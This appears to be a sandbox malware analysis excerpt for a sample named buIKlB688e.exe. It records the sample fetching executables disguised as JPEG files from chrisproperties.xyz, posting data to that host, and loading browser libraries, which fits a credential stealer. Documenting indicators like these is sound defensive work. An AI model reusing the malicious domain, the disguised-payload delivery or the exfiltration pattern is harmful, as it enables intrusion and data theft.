03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Oct 2021 10:35:37 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Thu, 06 Jun 2019 09:01:20 GMTETag: "217d0-58aa3f51a5800"Accept-Ranges: bytesContent-Length: 137168Vary: User-AgentKeep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Oct 2021 10:35:37 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Thu, 06 Jun 2019 09:01:30 GMTETag: "6b738-58aa3f5b2ee80"Accept-Ranges: bytesContent-Length: 440120Vary: User-AgentKeep-Alive: timeout=5, max=96Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Oct 2021 10:35:38 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Thu, 06 Jun 2019 09:01:44 GMTETag: "1303d0-58aa3f6888e00"Accept-Ranges: bytesContent-Length: 1246160Vary: User-AgentKeep-Alive: timeout=5, max=95Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Oct 2021 10:35:39 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Thu, 06 Jun 2019 09:02:02 GMTETag: "14748-58aa3f79b3680"Accept-Ranges: bytesContent-Length: 83784Vary: User-AgentKeep-Alive: timeout=5, max=94Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmpString found in binary or memory: http://chrisproperties.xyz/
                      Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmpString found in binary or memory: http://chrisproperties.xyz/1.jpg
                      Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmpString found in binary or memory: http://chrisproperties.xyz/1.jpg$
                      Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmpString found in binary or memory: http://chrisproperties.xyz/2.jpg
                      Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmpString found in binary or memory: http://chrisproperties.xyz/2.jpgB
                      Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmpString found in binary or memory: http://chrisproperties.xyz/3.jpg
                      Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmpString found in binary or memory: http://chrisproperties.xyz/4.jpg
                      Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmpString found in binary or memory: http://chrisproperties.xyz/4.jpg:
                      Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmpString found in binary or memory: http://chrisproperties.xyz/5.jpg
                      Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmpString found in binary or memory: http://chrisproperties.xyz/6.jpg
                      Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmpString found in binary or memory: http://chrisproperties.xyz/6.jpgj
                      Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmpString found in binary or memory: http://chrisproperties.xyz/7.jpg
                      Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmpString found in binary or memory: http://chrisproperties.xyz/main.php
                      Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmpString found in binary or memory: http://chrisproperties.xyz/main.php.
                      Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                      Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ocsp.digicert.com0N
                      Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ocsp.thawte.com0
                      Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                      Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                      Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: buIKlB688e.exe, 00000000.00000002.371640903.0000000002E74000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
                      Source: buIKlB688e.exe, 00000000.00000002.370505153.0000000001217000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: buIKlB688e.exe, 00000000.00000002.370505153.0000000001217000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comic9
                      Source: buIKlB688e.exe, 00000000.00000002.370505153.0000000001217000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comiono$
                      Source: buIKlB688e.exe, 00000000.00000002.370505153.0000000001217000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comoj
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: mozglue.dll.5.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                      Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: http://www.mozilla.com0
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: temp.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: temp.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: temp.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: temp.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: temp.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtabSQLite
                      Source: temp.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: temp.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: temp.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: buIKlB688e.exe, 00000005.00000002.389874310.0000000003320000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                      Source: buIKlB688e.exe, 00000005.00000002.389874310.0000000003320000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                      Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: temp.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownHTTP traffic detected: POST /6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                      Source: unknownDNS traffic detected: queries for: chrisproperties.xyz
                      Source: C:\Users\user\Desktop\buIKlB688e.exeCode function: 5_2_00421CF0 InternetSetFilePointer,InternetReadFile,_memset,HttpQueryInfoA,_memcpy_s,_memcpy_s,5_2_00421CF0
                      Source: buIKlB688e.exe, 00000000.00000002.370724291.0000000001280000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
